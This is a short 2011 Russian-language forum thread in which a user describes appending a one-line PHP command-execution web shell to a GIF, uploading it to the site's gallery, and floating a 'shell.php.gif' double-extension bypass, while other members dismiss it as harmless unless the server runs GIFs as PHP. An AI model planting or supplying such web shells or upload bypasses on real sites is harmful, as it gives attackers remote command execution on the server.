Уязвимость - шелл
1.
Удаленный (19.02.2011 / 23:42)
нечего взламывать не хотел, просто проверил, по этому тут рассказываю
открыл я файл test.gif блокнотом и добавил в самый конец :
<?php system($_GET["cmd"]); ?>
залил картинку на сайт тут:
http://visavi.net/gallery/?
-
http://visavi.net/gallery/index.php?act=showimg&gid=675&start=0&
можно еще такое на аватаре проверить.
может это уязвимость? может надо что бы сайт фильтровал бы содержимое картинки, или аватара ???
2.
Lugaro (20.02.2011 / 03:45)
Не уязвимомоть это и проверку делать нет смысла, всеравно не чем это не грозит, просто банан таким выдавать кто гадит в галерее, а картинку я снес т.к увидел её раньше чем эту тему
3.
Neformat (20.02.2011 / 04:04)
С каких пор gif как php выполняется? Руки оторвать за такие настройки сервера
4.
Вантуз-мен (20.02.2011 / 05:41)
я ничего не понял, что было-то?
5.
Андрей (20.02.2011 / 07:40)
нету там уязвимости... вот аватар мой например)
<?php echo "Hello world"; ?> написал и пофигу
Добавлено через 00:51 сек.
4: Vantuz, внешне, прозрачная картинка была
6.
JustZero (20.02.2011 / 10:57)
1.
Askme, работать не бут, пока в httacess не пропиш чеб картинку исполняло как пхп скрипт
7.
Удаленный (20.02.2011 / 17:13)
Абабагаламага. да, может картинка исполняет, а если например обойти расширение. shell.php.gif ???
8.
Александр (20.02.2011 / 17:22)
8, лучше гугл сломай.
9.
KOZZ (20.02.2011 / 17:37)
кулхацкер ))
10.
Удаленный (21.02.2011 / 20:08)
Прикольные тут теги ) не реклама
11.
Titov (21.02.2011 / 20:52)
11 и чо ето?
http://visavi.net/pages/rating.php?uz=Vantuz&vote=1&
Вантузу рейтинг набиваеш?
12.
Удаленный (21.02.2011 / 21:02)
12, да он мне чатлами платит
просто тег интересный [ url=http://адрес_cсылки Название ] [/url]
URL:
https://visavi.net/topics/18934